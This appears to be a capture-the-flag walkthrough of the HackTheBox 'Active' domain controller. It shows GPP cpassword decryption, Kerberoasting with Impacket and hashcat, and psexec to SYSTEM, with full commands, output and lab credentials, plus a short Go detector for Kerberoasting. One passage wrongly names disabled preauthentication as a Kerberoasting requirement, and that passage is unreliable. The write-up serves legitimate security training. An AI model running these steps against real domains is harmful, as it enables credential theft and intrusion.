This post is a walkthrough of the HackTheBox machine Active.
Hackthebox Active Walkthrough

Reconnaissance
Port-Scan
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.129.127.166
sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.129.127.166
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-30 20:02 EDT
Warning: 10.129.127.166 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.127.166
Host is up (0.15s latency).
Not shown: 64371 closed ports, 1141 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49169/tcp open unknown
49173/tcp open unknown
49174/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-30 20:02 EDT
Warning: 10.129.127.166 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.127.166
Host is up (0.16s latency).
Not shown: 65487 open|filtered ports, 47 closed ports
PORT STATE SERVICE
53/udp open domain
Open ports such as 88 (Kerberos), 389 (LDAP) and 445 (SMB) indicate an Active Directory domain controller, as the name of the box suggests. I am going to start with low-hanging fruit like the SMB service to see whether we have access to any shares and files.
SMB enumeration
enum4linux 10.129.127.166
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jul 30 20:36:25 202
Share Enumeration on 10.129.127.166 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.129.127.166
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/ADMIN$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/C$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/IPC$ Mapping: OK Listing: DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/NETLOGON Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/Replication Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/SYSVOL Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/Users Mapping: DENIED, Listing: N/A
Refer to the full output [here](Rchitect/enum4linuxoutput.txt at Yoda · tcprks/Rchitect · GitHub).
We can see that the “Replication” share allows anonymous read-only access.
smbmap -H 10.129.127.166
[+] IP: 10.129.127.166:445 Name: 10.129.127.166
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Let's browse the share to see its contents.
I could see a “Groups.xml” which contains the local administrator password in encrypted format.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
5217023 blocks of size 4096. 278651 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit
┌──(rocky㉿kali)-[~/hckbox/Active-1/smb]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
This comes from Microsoft Group Policy Preferences: when an account password is set through a GPP, the policy file stored in SYSVOL contains that password encrypted with a fixed AES key that Microsoft itself has published, so anyone who can read SYSVOL can recover it. More can be read here.
Now we have downloaded the encrypted password, which we can try to decrypt with “gpp-decrypt”, which is built into Kali, or you can get it from the [github repository](GitHub - t0thkr1s/gpp-decrypt: Tool to parse the Group Policy Preferences XML file which extracts the username and decrypts the cpassword attribute.).
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Now that we know the username and password, let's repeat the SMB enumeration we did anonymously earlier, this time with the newly decrypted credentials.
smbmap -H 10.129.66.52 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.129.66.52:445 Name: 10.129.66.52
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Now we have read-only access to more shares than just “Replication”.
Let's connect to the Users share now:
smbclient //10.129.66.52/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Sun Jul 31 19:41:32 2022
5217023 blocks of size 4096. 278635 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Kerberoasting
Kerberos is the protocol used for authentication in Windows domains. We could also see port 88 open in the nmap scan, which is the Kerberos port. The attack that abuses how Kerberos service tickets are protected is called Kerberoasting.
At a very high level, Kerberoasting works like this:
As a valid domain user we ask the DC for a service ticket for a particular service, and the DC sends back a ticket that is encrypted with a key derived from the service account's password. Normally we forward that ticket to the service; the service account can decrypt it and authorize our access. In Kerberoasting, instead of sending the ticket on to the service, we take it offline and crack the encryption with hash-cracking tools to recover the service account's password.
For this to work, primarily two conditions are required:
a valid domain user to request the service ticket
a user account control setting on the DC of “Do not require Kerberos preauthentication”
These posts (Post1, Post2, Post3) explain Kerberoasting very well, and Tim Medin's well-known talk [video](Tim Medin - Attacking Kerberos: Kicking the Guard Dog of Hades - YouTube) explains it in more detail.
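As an added defender-side example that is not part of the original post, the following Go code flags the footprint this request leaves on the DC: Security event 4769 with an RC4 (0x17) ticket for a user account's SPN, which is where a $krb5tgs$23$ hash comes from. The event lines are constructed and simplified to key=value form, and the client IP address is made up.

```go
package main

import (
	"sort"
	"strings"
)
// Constructed 4769 (service ticket requested) events flattened to key=value form, mirroring this
// box: SVC_TGS pulling an RC4 ticket for the Administrator SPN, plus benign noise. IP is made up.
var sampleEvents = []string{
	"EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=10.10.14.5",
	"EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.14.5",
	"EventID=4768 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.5",
}
// parseKV flattens one "key=value ..." line into a map.
func parseKV(line string) map[string]string {
	f := map[string]string{}
	for _, kv := range strings.Fields(line) {
		if p := strings.SplitN(kv, "=", 2); len(p) == 2 {
			f[p[0]] = p[1]
		}
	}
	return f
}
// IsRoastCandidate flags a 4769 where a user account's SPN was requested with RC4 (0x17): that
// ticket is encrypted with the account's NT hash, the $krb5tgs$23$ form hashcat mode 13100 cracks.
// Machine accounts (name$) and krbtgt are skipped: their keys are long random values, so normal.
func IsRoastCandidate(f map[string]string) bool {
	svc := f["ServiceName"]
	return f["EventID"] == "4769" && strings.EqualFold(f["TicketEncryptionType"], "0x17") &&
		!strings.HasSuffix(svc, "$") && !strings.EqualFold(svc, "krbtgt")
}
// RoastingReport lists, per requesting account, the distinct user service accounts it pulled RC4
// tickets for; one requester hitting several of them is the GetUserSPNs.py -request footprint.
func RoastingReport(lines []string) map[string][]string {
	seen := map[[2]string]bool{}
	report := map[string][]string{}
	for _, l := range lines {
		f := parseKV(l)
		key := [2]string{f["TargetUserName"], f["ServiceName"]}
		if IsRoastCandidate(f) && !seen[key] {
			seen[key] = true
			report[key[0]] = append(report[key[0]], key[1])
		}
	}
	for _, svcs := range report {
		sort.Strings(svcs)
	}
	return report
}
```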
Getting SPNs
Requesting tickets for the available SPNs (the response contains the ticket encrypted with the service account's key, which is the hash we will crack) can be done in multiple ways; one of them, using the “Impacket” toolkit, is explained below:
Using Impacket
Kali ships with Impacket, whose GetUserSPNs.py lists the user accounts that have SPNs and requests a ticket for each of them. Make sure the /etc/hosts file maps the domain hostname to the IP. The command needs a valid domain username and password, which we already obtained through the earlier enumeration.
Command and output:
GetUserSPNs.py -request -dc-ip 10.129.74.76 active.htb/SVC_TGS -save -outputfile GetUserSPNs1.out
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2022-08-03 20:07:39.536132
┌──(rocky㉿kali)-[~/hckbox/Active-1/kerberoasting]
└─$ cat GetUserSPNs1.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c81603cbceedab44362b6e0723a29feb$…
Based on the hash type (the $krb5tgs$23$ prefix corresponds to hashcat mode 13100, as listed here), we can use hashcat with the rockyou wordlist to crack it.
My VM PC did not work with hashcat, so I had to do it on a separate PC.
On the VM PC the error was as follows:

On the physical PC:
c:\hashcat\hashcat-6.2.5\hashcat-6.2.5>.\hashcat.exe -m 13100 -a 0 "c:\hashcat\hashcat-6.2.5\hashcat-6.2.5\activehtb1spn.txt" "e:\OSCP wordlist\rockyou.txt" -o activecrakedkey.txt
hashcat (v6.2.5) starting
hipDeviceGetAttribute(): 1
Successfully initialized NVIDIA CUDA library.
Failed to initialize NVIDIA RTC library.
* Device #2: CUDA SDK Toolkit not installed or incorrectly installed.
CUDA SDK Toolkit required for proper device support and utilization.
Falling back to OpenCL runtime.
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
ADL2_Overdrive_Caps(): -8
ADL2_Overdrive_Caps(): -8
ADL2_Overdrive_Caps(): -8
ADL2_Overdrive_Caps(): -8
ADL2_Overdrive_Caps(): -8
nvmlDeviceGetFanSpeed(): Not Supported
ADL_Overdrive5_FanSpeed_Get(): -100
ADL_Overdrive5_Temperature_Get(): -100
HIP API (HIP 4.4)
=================
* Device #1: AMD Radeon(TM) Graphics, skipped
OpenCL API (OpenCL 3.0 CUDA 11.6.134) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: NVIDIA GeForce GTX 1650 with Max-Q Design, 3520/4095 MB (1023 MB allocatable), 14MCU
OpenCL API (OpenCL 2.1 AMD-APP (3354.13)) - Platform #2 [Advanced Micro Devices, Inc.]
======================================================================================
* Device #3: AMD Radeon(TM) Graphics, 6144/12380 MB (5043 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Initializing backend runtime for device #2. Please be patient...
After some time I got the cracked password, and with it I have full access to the SMB shares we accessed earlier.
We have the root flag now, even without getting shell access:
┌──(rocky㉿kali)-[~/hckbox/Active-1/smb]
└─$ smbclient //10.129.54.97/C$ -U active.htb\\administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Mon Jul 13 22:34:39 2009
Documents and Settings DHSrn 0 Tue Jul 14 01:06:44 2009
pagefile.sys AHS 5190324224 Sat Aug 27 20:14:34 2022
PerfLogs D 0 Mon Jul 13 23:20:08 2009
Program Files DR 0 Wed Jan 12 08:11:58 2022
Program Files (x86) DR 0 Thu Jan 21 11:49:16 2021
ProgramData DHn 0 Wed Jan 12 08:09:27 2022
Recovery DHSn 0 Mon Jul 16 06:13:22 2018
System Volume Information DHS 0 Wed Jul 18 14:45:01 2018
Users DR 0 Sat Jul 21 10:39:20 2018
Windows D 0 Wed Jan 12 08:16:00 2022
5217023 blocks of size 4096. 278168 blocks available
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Privileged Shell
To get a command prompt as Administrator, we can try Impacket's “psexec.py”:
psexec.py active.htb/administrator@10.129.54.97
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.54.97.....
[*] Found writable share ADMIN$
[*] Uploading file FVzkhpqi.exe
[*] Opening SVCManager on 10.129.54.97.....
[*] Creating service Urbc on 10.129.54.97.....
[*] Starting service Urbc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> wwhoami
'wwhoami' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32> whoami
nt authority\system
